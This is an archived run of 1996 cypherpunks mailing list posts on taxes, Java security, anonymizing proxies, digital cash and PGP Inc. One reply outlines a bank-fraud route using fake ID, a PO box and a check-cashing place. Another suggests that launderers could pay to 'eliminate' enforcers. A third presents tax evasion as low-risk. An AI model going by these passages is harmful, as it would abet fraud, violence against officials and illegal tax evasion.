haven of some sort.

It turns out, as it does for many people I know, that my assets are
relatively traceable. Salaries and even consulting fees are reported
assiduously. Stocks can certainly be moved offshore, but the IRS obviously
knows where they are (the institutions that keep records of stock ownership
will tell them, for one thing...this may take a few years for the records
to catch up, but they ultimately will).

Certainly I could liquidate one form of my assets (stocks, real estate,
etc.) and simply move the money out of the country. Tax evasion is always
an option. But the price paid if one gets caught tends to be rather high.

(Despite what you hear anecdotally about the IRS "settling" for pennies on
the dollar.)

Call me a skeptic.

I will do my best not to be drawn into a debate that has been held here
several times before. If Sandy, Duncan, etc., believe it is so easy to
avoid taxes--on the resources we are talking about, not sheltering small
amounts--or if they claim that I am obviously not following their advice,
I'll let them make these claims without any attempt to rebut them. I've
been there and done that before.

I have no doubt that "tax planning" works for some people, and I think
certain people like Vince Cate may do well in places like Anguilla,
essentially starting a business from scratch. I even have longterm hopes
for tax havens, cyberspace tax havens, anonymous systems, etc. But this
ain't happening soon.

But I see no clear way that X shares of Apple, Y shares of Sun, Z shares of
Intel, etc. can be converted into other forms without taxes being paid, or
evaded. (Evaded, not avoided.) I recall Sandy claiming some scheme where I
would use my shares as collateral and borrow tax-free against them. Sure,
it's what I do everyday with my margin account. But to ultimately pay off a
margin debt by selling assets involves taking capital gains (if there were
any, of course--a safe bet in the last 10 years), and at this point the IRS
and California Franchise Tax Board want their 40-45% cut.

Not being prepared to risk imprisonment for tax evasion, and being desirous
of living in the United States rather than on a coral atoll, I answer the
questions that Macintax asks me, gulp when I see the final figure, and
write out a check (which I then have to sell even more stock to
cover...perpetuating the cycle).

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 5 May 1996 12:31:36 +0800
To: hal9001@panix.com
Subject: Re: [Political Rant] Was: examples of mandatory content rating?
Message-ID: <01I4BKO04WVI8Y53GG@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"hal9001@panix.com"  "Robert A. Rosenberg" 15-APR-1996 03:46:01.05

>At 18:52 4/14/96, E. ALLEN SMITH wrote:

>>I'm not sure if the major use for ratings may not be searching for
>>material that the raters don't like. I'd be interested in many things the
>>fundys don't like, for instance. One could even do this via one of the
>>"services" that mails out listings of places to be locked from kids - just
>>sign up one of your anonymous employees, and get the data and put it on your
>>anonymous web access site. Doing so - if you don't admit you've done it - may
>>be cheaper than doing the research yourself. Of course, you'll need to check
>>out each such site to make sure that it isn't a decoy that they've inserted.

>When you do the checking, make sure it is from an IPN that does not point
>back at you (or at least only points to a Server Supplied not a Dedicated
>IPN). You might also want to watch out for "Canary Trap" Decoys (where each
>list has an unique set of Decoys [or at least one unique Decoy] so they can
>tell which copy was compromised). I'm assuming that the Decoy is a "valid"
>[possibly virtual] domain address which is being logged.

	The way to get around the second problem is to sign up with such a
"service" twice, then filter out anything not appearing on both. Since at least
some of the parental censorship "services" have customization for the parent,
doing more than one would also be a means to pick up more specific evaluations
of the sites in question.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 5 May 1996 15:35:06 +0800
To: "E. ALLEN SMITH" <cypherpunks@toad.com
Subject: Re: Money Laundering Conference with Government Types
Message-ID: <m0uFuoc-00095MC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:26 PM 5/4/96 EDT, E. ALLEN SMITH wrote:
>	I thought people might find interesting the following conference
>that I located at http://www.oceanlaw.com/20/conf/ml.htm. Know thine enemy,
>and all that. It has a section on Digital Cash (note the title includes
>"Cyberpayments").
>	-Allen
>   
>   An Invitation from Fletcher N. Baldwin, Jr., Professor of Law and
>   Director of the Centre for International Financial Crimes Studies, and
>   Robert J. Munro, Program Coordinator and Co-Director of the Centre for
>   International Financial Crimes Studies.
>
>   _It's not enough to BE clean -- You must also LOOK clean._
>   
>   Money Laundering and Asset Forfeiture are critical consequences for
>   the banks, attorneys, securities dealers and corporations, both
>   domestic and international, who may be inadvertently in
>   non-compliance. _Our program will give you:_

I wonder how long it's going to take before these "money-launderers" learn 
that by taking, say, 10% of the amount of money they launder in one year, 
they can eliminate the people trying to stop them.  Forever.

Jim Bell
jimbell@pacifier.comJim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 5 May 1996 13:32:27 +0800
To: watt@sware.com
Subject: Re: Bank transactions on Internet
Message-ID: <01I4BKYQ0HBO8Y53GG@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"watt@sware.com"  "Charles Watt" 16-APR-1996 13:06:06.52

>First, the U.S. banking system is very nice to account holders.  The banks,
>rather than the customers, assume all risk associated with security problems
>in telephone banking, ATMs, etc...  Internet banking is no different, which
>explains why so few banks have jumped onto the net with real transactions.
>If an SFNB customer should lose any funds due to a security problem, SFNB
>pays, not the customer.

	That would depend on whether the customer can prove a security problem,
because otherwise you're going to get a lot of con artists making a lot of
money off of you.

>Second, in order to break the SSL-protected password of an SFNB account
>holder, you need access to the encrypted data.  This is not easy to obtain
>over the Internet, and would generally require illegal activity in order 
>to gain control of a host within the Internet infrastructure or collusion 
>with the account holder.  Should an attacker crack the key and obtain 
>the account number and password of an SFNB account holder, they are clearly 
>warned upon login that they are engaging in illegal activity.  Once they 

	One, ever heard of a packet sniffer? If the account holder is on an
Intranet, then someone within it could easily get such information. Two,
somehow I suspect that the penalties for computer breakins are significantly
less than those for bank fraud/grand theft; they aren't going to matter if
you're willing to take the risk.

>have logged in, there is no way to transfer money out of the account 
>without leaving a target address and phone number for the recipient.  
>Furthermore, any payment to an individual or unknown entity would be 
>made in the form of a physical check that would have to be cashed at
>a physical bank.  The whole process is heavily audited with real-time 
>audit filtering and pattern matching capabilities -- SFNB is, afterall, 
>running on a military grade secure operating system (see SWP at 
>www.secureware.com).  Any security system that is deployed should be
>compared against the value you are trying to protect.  It seems like a 
>pretty big risk to an attacker -- and I assure you SFNB will prosecute.

	Target address and phone number? Make fake ID, get yourself a PO box
and a telephone forwarding/answering service (giving the PO box as the
address), then target it there. Use the fake ID at a check-cashing place. You
can make the fake ID in whatever name you want, which makes it easier.

>Finally, I whole-heartedly agree that 40-bit encryption is far too weak 
>for many applications, and that the current export limitations are absurd.  

	I'm glad you realize that. I've edited out what look to be
improvements, which I hope for your stockholders' sake you've implemented.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 5 May 1996 16:00:00 +0800
To: cypherpunks@toad.com
Subject: Reputation Webs and Java/Applet Security
Message-ID: <adb16fa0020210043fac@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:10 PM 5/4/96, Blake Coverett wrote:

>I was right in the first message... it is a reputation thing.  We don't
>disagree on any of the fact here, just on their implications.
>
>I see this from the point of view of the author of these native methods,
>cypherpunk still do write code sometimes.  From that point of view
>where is the difference between calling my native code methods and
>calling the java.awt.*, or netscape.* methods that are native code?  Yes,
>either can do anything they want, irregardless of the SecurityManager.
>
>For J. Random User on the net, Sun/Netscape's reputations are
>fairly strong and mine is non-existent.  For the corporate IS folks to
>whom I contract this situation is reversed.  (Despite impressive IPOs
>I still get a lot of friction about 'programs downloaded from the net'.)

By the way, I think "reputation webs" may get one of their earliest uses in
this situation, with applets or chunks of code being "vouched for" by
testing or credentialling agencies, analogous to Good Housekeeping Seals
and Underwriter's Laboratories. (This model applies to more than just Java
applets, of course. To some extent, reviews of programs and testing of
snippets of code has always involved this "reputation rating" process...I'm
just suggesting it could be implemented in-line with the runtime
environment....)

While we often talk about the human example, where we want to do nifty
things like rank and rate the postings of J. Random User by what others we
trust (or don't trust) are saying, the fact is that most people are willing
to see what J. Random User is writing and judge for themselves. Hence,
reputation markets (what I'm calling "reputation webs," as with "webs of
trust") have been slow to take off in human communication circles. (At
least automated, that is.)

For Java applets, once digital signatures are supported we have the
possibility of automating the checking of who has said good things about
the applets, who has said bad things, how much faith we place in these
opinions, and so on. Almost a class hierarchy in itself (though mix-ins
might be useful, as the hierarchy is not strictly single-inheritance, it
seems).

Thus, the "Wall Street Testing Agency," with various stringent policies
about what applets can do and what they must not be allowed to do, may have
ratings of applets, keeping even Perry happy. Someone at a Wall Street firm
could then screen out applets based on these ratings. Others might have
completely different criteria.

(And the web could change dynamically, as the user's environment changed.
For example, a PC used largely for games will likely have a different model
of whom to trust than a workstation used for high finance. And one could
imagine moving sensitive files to a removable disk, popping out this disk,
and then altering the settings to reflect a lower perceived risk.)

Virus checking is to some extent already in this model, with
"well-regarded" virus checkers acting as a gatekeeper of sorts.

One might even (hopefully!) be able to integrate this directly into one's
programming environment. Maybe the "SecurityManager" class could be turned
into a "ReputationManager" class, with today's "SecurityManager" being just
one of many possible configurations (e.g., the one JavaSoft is
recommending).

And the NSA and NCSC might have their own "Orange Book" sorts of requirements.

Let a thousand flowers bloom...but keep track of their reputations.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 5 May 1996 13:20:44 +0800
To: shamrock@netcom.com
Subject: Re: Smartcards are coming to the US
Message-ID: <01I4BLCKMH628Y53GG@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"shamrock@netcom.com" 21-APR-1996 21:08:17.34

>At 15:15 4/21/96, Brad Dolan wrote:
>>Saw a CNN story Friday about an interesting special debit card
>>application in Mexico.  They're being issued to poor Mexicans, who can
>>use them to buy tortillas and a few other foodstuffs.  The cards are tied to
>>a behavior-control database and failure to send kids to school, get
>>mandatory medical exams/treatments/vaccinations, etc. results in card
>>deactivation.

>My first response was: he is making this up. But it shoudn't come as a
>surprise to any reader of this list. Expect to see more of it.

	Ever read _The Bell Curve_?
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Sun, 5 May 1996 15:58:25 +0800
To: Black Unicorn <brerrabbit@alpha.c2.org
Subject: Re: CryptoAnarchy: What's wrong with this picture?
Message-ID: <199605050410.VAA14391@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 01:54 AM 5/4/96 -0400, Black Unicorn wrote:
> Actually, I disagree with Mr. Sandfort on this one.
>
> Taxation of International Income is a tremendously complicated field.
> (You can get an LL.M. in international taxation alone for example).

I do not believe the IRS particularly cares what all those tons of 
tax legislation books say, and I am sure they do not know.

Unicorn seems to be thinking in terms of constructing magic pieces 
of paper that will protect you from the bad boys, whereas Sandy is 
thinking in terms of making sure the bad boys cannot find your money.

While doubtless magic bits of paper are useful to some extent if 
you are a genuinely multinational corporation, if the bad boys 
see smaller fry carefully concocting magic paper they will say 
"ah, tax haven", jump on you like a ton of bricks, extort information 
from anyone in their jurisdiction as to where your money is (which 
is why Sandy recommends a lawyer who works OUTSIDE the jurisdiction) 
and confiscate all your assets and not give them back until you can 
prove you have paid taxes on everything you might possibly have 
earned and some things you could not possibly have earned.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Victor Boyko <vboykod@eldorado.stern.nyu.edu>
Date: Sun, 5 May 1996 14:28:33 +0800
To: EALLENSMITH@ocelot.Rutgers.EDU
Subject: Re: Why I dislike Java. (was Re: "Scruffies" vs. "Neats")
In-Reply-To: <01I49T6J284A8Y56P8@mbcl.rutgers.edu>
Message-ID: <9605050131.AA01873@eldorado.stern.nyu.edu>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Allen" == "E ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU> writes:

    Allen> 	Might I suggest setting up another computer with Java
    Allen> enabled, and _without_ the critical applications? Somehow,
    Allen> I think they can afford an extra computer for each desk -
    Allen> it wouldn't have to be a high-capability one. That would
    Allen> also cure having to have Netscape and other
    Allen> high-network-access programs on the same computers as the
    Allen> critical applications. (Of course, some of the critical
    Allen> applications may also need to access the Internet... but
    Allen> they probably wouldn't need http capability.) Of course,
    Allen> feel free to tell me that I don't know what I'm talking
    Allen> about.

And I suppose the next thing you are going to suggest is to get an
extra firewall just for the Java-enabled machines. This is just a
waste of money and resources. I firmly believe that access and
security control should be left to the operating system: OS's have
been designed with that task in mind for decades, while 'secure'
virtual machines, AFAIK, only appeared recently. Also, the OS uses
hardware (supervisor mode bit) to protect the kernel from unauthorized
access, while a Java interpreter could only do it in software.

Why not make Netscape SUID root and have it spawn a separate process
just for running Java as user nobody? Communication between the
processes could be done through sockets (it is better not to share any
address space). Then you could at least be sure it could not read or
write any unprotected files and directories. Most OS's don't restrict
network access for processes, but this should be easy to add: just
have additional flags in the process descriptor and have all system
calls related to the network check those flags.

I understand that the above does not apply to Win95 and Mac. There is
only one thing I can say to those unfortunate enough to use them:
install UNIX!!! Linux for PC has been available for a while, and Linux
for PowerPC should come out this Summer. (And yes, I know that UNIX's
sometimes have security bugs too, but there are much fewer of them
than in Netscape's Java interpreter, and they are usually fixed sooner.
Also, UNIX has been around for 25 years, while Java-enabled Netscape
for less than a year.)

Any constructive comments or criticism about UNIX and Java security is
welcome. Send flames to /dev/null.

-- 
Victor Boyko <vboykod@is-2.nyu.edu>
http://galt.cs.nyu.edu/students/vb1890/
To get my PGP key, finger or send e-mail with subject "send pgp key".




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Victor Boyko <vboykod@eldorado.stern.nyu.edu>
Date: Sun, 5 May 1996 14:48:51 +0800
To: EALLENSMITH@ocelot.Rutgers.EDU
Subject: Re: Why I dislike Java. (was Re: "Scruffies" vs. "Neats")
In-Reply-To: <01I4BN143E1S8Y56PB@mbcl.rutgers.edu>
Message-ID: <9605050200.AA01957@eldorado.stern.nyu.edu>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Allen" == "E ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu> writes:

    Allen> 	Why bother, if they don't have any critical stuff on
    Allen> them?

But you certainly would not want the Java machines to be behind the
same firewall as the non-Java ones, since then the firewall would be
useless (see http://www.cs.princeton.edu/sip/pub/secure96.html). And
you would probably want to have a second firewall anyway, since the
machine running Netscape can contain confidential information
downloaded from the net. Also, if Netscape is used to access password
protected (or SSL encrypted) documents/forms, an attacker with access
to the non-secure machine can get many kinds of secret information,
including passwords and credit card numbers.

-Victor

-- 
Victor Boyko <vboykod@is-2.nyu.edu>
http://galt.cs.nyu.edu/students/vb1890/
To get my PGP key, finger or send e-mail with subject "send pgp key".




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 5 May 1996 16:25:51 +0800
To: cypherpunks@toad.com
Subject: PGP, Inc.
Message-ID: <adb18549030210045691@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



(I've been missing some e-mail, for various reasons, including a 20 MB
mailbomb from some German critic of my views, but I think I would've seen
this discussed more than I have.)

Phil Zimmermann is apparently forming a Bay Area company, to be known as
PGP Inc., with venture funding from one of the Seybold clan, according to
an article by Simson Garfinkel in today's SJMN. (Which says the
announcement was actually made last Tuesday....)

Jonathan Seybold, Dan Lynch (a founder of Cybercash), Tom Steding
(ex-Novell) are some of the names involved. Initial products will include
PGP and PGPfone.

No mention of programmers, jobs available, etc., except that they "will
begin hiring shortly."

And the connection with ViaCrypt and RSADSI seems unclear to me.

Anybody else have any more information?

If this whole thing is a spoof, it made it into the SJMN.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman)
Date: Sun, 5 May 1996 17:03:30 +0800
To: cypherpunks@toad.com
Subject: Re: Why I Pay Too Much in Taxes
In-Reply-To: <adb163b00102100471cc@[205.199.118.202]>
Message-ID: <199605050534.WAA14061@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> Not wanting to join in this bashing of taxes--my views are clear, as
> evidenced in the title of this thread--but I have to point out that I paid
> approximately 60% of everything I made last year to the tax collectors!
> This counts the Federal income tax (about 32%), the California income tax
> (about 11%), the "self-employment tax" (FICA) for some consulting I did
> (15%), property tax on my old residence ($2200), property tax on my new
> residence ($4200), sales tax on purchases (8.25%), gasoline taxes (about
> 30-40 cents per gallon), a special tax on my Ford Explorer ($300), and
> probably some miscellaneous other taxes I have neglected.
> 
> And of course the corporations that pay me dividends and whose stock price
> shows gains have _already_ paid roughly 45% or so in taxes, depending on
> how clever they were at allocating costs to minimize taxes. This is the
> famous "double taxation" of corporate earnings one hears about. Intel, for
> example, pays 45% of its considerable income in taxes, sends some of the
> remaining profits to me in the form of capital gains and dividends, and I
> then pay another 40% or so in income taxes on this share. The math is
> pretty simple...there ain't much left over. (The much-derided Laffer Curve
> is actually quite important here...when overall tax rates get high enough,
> people choose to do less work. Some of us even retire early.)

Although your viewpoint is well expressed, I feel you've
overlooked the possibility of socialism to solve the high
tax outrages detailed.

Socialism, a truly progressive economic system, would have
an actual graduated income tax, to discourage useless
make-work by the rich.

There are so many other benefits to patriotic socialism, it
would take a book the size of Das Kapitol just to list them.

For instance:

Taxes on trade, will act as a tonic on the national economy.

The tax on trade, of course, prevents it; relieving the
national security apparatus of 90% of its reason for being.

The state itself as a unifying theme, rather than patho
meanderings like crime, anti-racism, and religion.

Tcmay, you've already acted on your socialistic urges without
even knowing it; your successfully operating a free people's
spontaneous propaganda bureau.  Please develop this further
and thumb your nose at the members of your class.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sun, 5 May 1996 17:38:55 +0800
To: cypherpunks@toad.com
Subject: Senator Leahy's Public Key
Message-ID: <199605050623.XAA17801@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


The more I think about Senator Leahy's public key, the more I keep coming
back to a point I only alluded to before.

How do we know the key is actually his key?

The key is only self signed.  It could be a fake.  If, as I have assumed,
its primary use will be to sign public statements posted to the net, how
will we know they are actually from Senator Leahy, and not some impostor?

I strongly urge the senator to join the web of trust and get some other
signatures on his key.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Busarow <dan@dpcsys.com>
Date: Sun, 5 May 1996 19:30:55 +0800
To: Victor Boyko <vboykod@eldorado.stern.nyu.edu>
Subject: Re: Why I dislike Java. (was Re: "Scruffies" vs. "Neats")
In-Reply-To: <9605050131.AA01873@eldorado.stern.nyu.edu>
Message-ID: <Pine.SV4.3.91.960504233644.14012B-100000@cedb>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 4 May 1996, Victor Boyko wrote:
> I understand that the above does not apply to Win95 and Mac. There is
> only one thing I can say to those unfortunate enough to use them:
> install UNIX!!! Linux for PC has been available for a while, and Linux

Even though Victor likes C++, I share his sentiment that a lot of
people would be happier with Unix if only the marketing forces hadn't
driven them into the clutches of the Dark Lord.

Since this has already degenerated into a religious argument (actually
it started as one), I'll throw this in

FreeBSD and/or NetBSD are the way to go.  Actual facts follow.

FreeBSD is "free"
  Just like Linux, you can get FreeBSD off the 'Net for free.
  You can also buy a CDROM for < 100USD, just like Linux.

FreeBSD has solid networking code
  Since it is built on 4.4BSD its TCP/IP implementation has had more
  bashing than anything else around.  It works. It's fast.

FreeBSD has source available
  If you want the full source, or just the kernel source, grab it.  
If all you need is a running system, don't bother.  Most people don't 
need kernel or utility, e.g cat or ls, source.

FreeBSD has a *single* source
  This may seem to be a disadvantage to some.  But when the core team 
releases a new version of FreeBSD you can be certain that it has been
widely tested and is at worst a _small_ step forward, not backwards or
sideways.  It might even be a _big_ step forward.  If they disappear,
you still have the source (assuming it was important enough for you
to grab it).

For me it boils down to the networking code.  I need it to work reliably 
and fast.  FreeBSD delivers, Linux promises.

ObCrypto: pgpsendmail is a standard package with FreeBSD (and probably
Linux too :)

Dan
-- 
 Dan Busarow
 DPC Systems
 Dana Point, California





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lwp@conch.aa.msen.com (Lou Poppler)
Date: Sun, 5 May 1996 19:19:02 +0800
To: Black Unicorn <cypherpunks@toad.com>
Subject: Re: WWW proxies?
In-Reply-To: <Pine.SUN.3.93.960426191223.12146D-100000@polaris.mindport.net>
Message-ID: <87CjxMz2Bg3W083yn@mail.msen.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 26 Apr 1996 19:13:06 -0400 (EDT),
Black Unicorn <unicorn@schloss.li> wrote:
} 
} Has anyone developed such a beast yet?

I know of two anonymizing web proxies.  See:
http://hplyot.obspm.fr:6661/            and:
http://anonymizer.cs.cmu.edu:8080/

I think both sites offer source for what they are doing.
I've used the Observatory de Paris site a few times as http_proxy.
Last I checked, the Carnegie-Mellon site only serves requests from
*.cmu.edu clients.

:::::::::::::::::::::::::::::::::::::: Recently seen on a California
:: Lou Poppler <lwp@mail.msen.com>  ::  license plate on a VW beetle:
::      http://www.msen.com/~lwp/   ::        
::::::::::::::::::::::::::::::::::::::          "FEATURE"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 5 May 1996 18:38:32 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: A MODEST PROPOSAL (fwd)
Message-ID: <199605050754.AAA02842@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:05 PM 5/4/96 EDT, "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu> wrote:
>	The reason I say majordomo is broken is that it shows up
> with the address of the original sender, not the address of the list,
> as the From address. Other mailing list software does not do this.

I think that's user-settable, but there is no ideal approach.
Cypherpunks tried several different approaches to addresses, 
and settled on this one as causing the least overall problems.
The big advantage is that replies go to the original sender by default 
rather than to the list (which reduces the amount of personal mail going
to the list, winning both on noise-reduction and embarassment-reduction);
the disadvantage is that bouncemail goes to the original sender, rather
than the list or the list-manager (bouncemail to the sender is annoying, 
but minor; bouncemail to the list is extremely annoying, as well as 
potentially causing mail loops, which are an extreme lossage.  Bouncemail
to the list-manager is ideal (not that the list-manager usually reads it),
but it's hard to get without reducing replies directly to originators,
as well as increasing replies accidentally going to the list-manager.
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215
# goodtimes signature virus innoculation






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 5 May 1996 21:17:02 +0800
To: lwp@conch.aa.msen.com
Subject: Re: WWW proxies?
Message-ID: <199605051004.DAA04246@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:30 AM 5/5/96 -0400, you wrote:
>} Has anyone developed such a beast yet?
>
>I know of two anonymizing web proxies.  See:
>http://hplyot.obspm.fr:6661/            and:
>http://anonymizer.cs.cmu.edu:8080/

anonymizer has moved to www.anonymizer.com:8080 (hosted on c2.org.)
There's also the Great Web Canadianizer, if you don't mind reading
pre-hosed web pages, eh?   Anonymizer does a better job, fixing up
things like REMOTE-HOST, REMOTE-ADDR and HTTP-COOKIE which pass
some information about the originating system.  HTTP-DONUT, eh?

Also, Netscape 3.0 is a bit quieter than earlier versions.
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215
# goodtimes signature virus innoculation






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sun, 5 May 1996 22:26:34 +0800
To: cypherpunks@toad.com
Subject: Re: Why I Pay Too Much in Taxes
Message-ID: <2.2.32.19960505112614.0097f498@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:31 PM 5/4/96 -0700, Timothy C. May wrote:

>Not being prepared to risk imprisonment for tax evasion, and being desirous
>of living in the United States rather than on a coral atoll, I answer the
>questions that Macintax asks me, gulp when I see the final figure, and
>write out a check (which I then have to sell even more stock to
>cover...perpetuating the cycle).
>
>--Tim May

The Transaction Records Clearinghouse has expanded their site on actual IRS
criminal prosecutions into a neat table (for 1994) which shows:

odds of referral (per million pop)                17
odds of conviction (per million pop)               8
odds of prison (per million pop)                   4
# of referrals for prosecution                 4,542
# convicted after prosecution                  1,991
# sentenced to prison terms                      957
population of federal district           260,340,990

http://www.trac.syr.edu/tracirs/analysis/IRS017tab.html

For comparison, the annual risk of being murdered is about 80 per million (8
per 100,000).  In addition, only 40% of the above refferals are for ordinary
tax fraud and evasion.  Sixty percent are for drug and money laundering
kinds of offenses. 

Even though the population of those who regularly violate federal tax laws
is smaller (20 million?) the records show that even for this population the
odds of being convicted are approximately the odds of being nurdered.

http://www.trac.syr.edu/tracirs/analysis/IRS019page.html 

Shows that the *median* prison sentence and *median* fine after conviction
is Zero in both cases.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Mon, 6 May 1996 02:03:56 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re:  Kid Gloves or Megaphones
Message-ID: <v02120d00adb1d07be5a7@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 19:58 5/4/96, E. ALLEN SMITH wrote:
>From:   IN%"shamrock@netcom.com" 21-MAR-1996 21:29:06.87
>
>>It is true that the issuer is unable to discover that double blinding is
>>being used. The real problem with the protocol is that it requires
>>payor/payee collusion, which may make it difficult to execute.
>
>        Can the payee discover that the payor isn't colluding before the bank
>can figure out who the payee is?

Yes, since the payee determines the serial numbers of the coins during
intitiation of the protocol. It is the payee that also assembles the final
coins. If the serial numbers are a match and the signature of the bank
verifies, then the protocol has been completed.


Disclaimer: My opinions are my own, not those of my employer.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Mon, 6 May 1996 02:03:50 +0800
To: Moltar Ramone <sandfort@crl.com>
Subject: Re: CryptoAnarchy: What's wrong with this picture?
Message-ID: <v02120d01adb1e91faf9f@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 17:17 5/4/96, Moltar Ramone wrote:
[...]
>> 6)  DON'T talk to anyone else--especially in your home
>>     country--about what you have done, are doing or
>>     are planning to do.
[...]
>> 8)  Send me $1000.  If you follow my steps 1-7, you will
>>     save many times that amount.
>
>There's the rub... step 8 violates step 6. If following your directions
>indicates a moral obligation to pay, doing so would violate your
>directives and make one _not_ obligated to pay... :-)

No contradiction here. Just make the payment to Sandy anonymously.


Disclaimer: My opinions are my own, not those of my employer.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@cs.berkeley.edu>
Date: Mon, 6 May 1996 03:48:47 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: PGP, Inc.
In-Reply-To: <adb18549030210045691@[205.199.118.202]>
Message-ID: <318CBD1E.333AE622@cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> 
> (I've been missing some e-mail, for various reasons, including a 20 MB
> mailbomb from some German critic of my views, but I think I would've seen
> this discussed more than I have.)
> 
> Phil Zimmermann is apparently forming a Bay Area company, to be known as
> PGP Inc., with venture funding from one of the Seybold clan, according to
> an article by Simson Garfinkel in today's SJMN. (Which says the
> announcement was actually made last Tuesday....)
> 
> Jonathan Seybold, Dan Lynch (a founder of Cybercash), Tom Steding
> (ex-Novell) are some of the names involved. Initial products will include
> PGP and PGPfone.
> 
> No mention of programmers, jobs available, etc., except that they "will
> begin hiring shortly."
> 
> And the connection with ViaCrypt and RSADSI seems unclear to me.

   I doubt that the new company will have any connection with ViaCrypt.
It's been well known for quite some time that relations between Phil
Zimmermann and ViaCrypt have been, well, strained. I have no idea about
RSADSI.

